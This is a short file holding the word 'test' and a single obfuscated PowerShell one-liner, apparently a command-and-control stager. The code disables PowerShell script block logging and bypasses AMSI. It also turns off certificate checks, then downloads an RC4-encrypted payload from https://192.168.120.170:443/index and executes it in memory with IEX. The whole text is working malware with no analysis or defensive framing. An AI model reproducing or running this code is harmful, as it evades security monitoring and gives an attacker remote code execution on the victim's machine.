test

IF($PSVerSIonTabLE.PSVeRsIon.MAJoR -Ge 3){$GPF=[Ref].ASsemBlY.GETTYpe('System.Management.Automation.Utils')."GEtFIE`Ld"('cachedGroupPolicySettings','N'+'onPublic,Static');IF($GPF){$GPC=$GPF.GetVaLUe($nuLl);IF($GPC['ScriptB'+'lockLogging']){$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$VAL=[CollECTIONS.GEnerIc.DICtiONaRY[STriNg,SyStEM.OBJecT]]::NeW();$VaL.ADD('EnableScriptB'+'lockLogging',0);$VAL.ADd('EnableScriptBlockInvocationLogging',0);$GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$VAl}ELsE{[SCrIPTBLock]."GetFie`LD"('signatures','N'+'onPublic,Static').SetVAlUE($NUll,(NEw-OBJECt CollectIons.GenERIc.HAshSeT[strINg]))}[REF].AssEMBLY.GEtType('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GEtFieLd('amsiInitFailed','NonPublic,Static').SETVALuE($nULL,$true)};};[SYStEM.NET.SERVIcePOINtMANaGER]::ExPEcT100CoNTiNue=0;$Wc=NEw-OBJeCt SysTEM.NeT.WebCLIEnt;$u='Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$Wc.HeAdERs.AdD('User-Agent',$u);$WC.ProxY=[SYsteM.NeT.WebREqUeSt]::DEFaUlTWebPrOXY;$wc.PrOXY.CReDeNTIals = [SysteM.Net.CrEdENtiaLCaCHE]::DeFAulTNETWOrKCredENTiALS;$Script:Proxy = $wc.Proxy;$K=[SystEM.TeXt.ENcODIng]::ASCII.GEtBYTEs('y4mnkr!=[h9db+Nf|O^:_LzFt7w6T-{U');$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.COuNT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bXOR$S[($S[$I]+$S[$H])%256]}};$ser='https://192.168.120.170:443';$t='/index';$WC.HEadErs.Add("Cookie","session=uc6G1vsTp0mndpiyFYaBKtcYoto=");$dAta=$WC.DOWNLoAdDatA($Ser+$T);$IV=$DATa[0..3];$daTA=$daTa[4..$dATA.lENgth];-JoIN[CHAR[]](& $R $DatA ($IV+$K))|IEX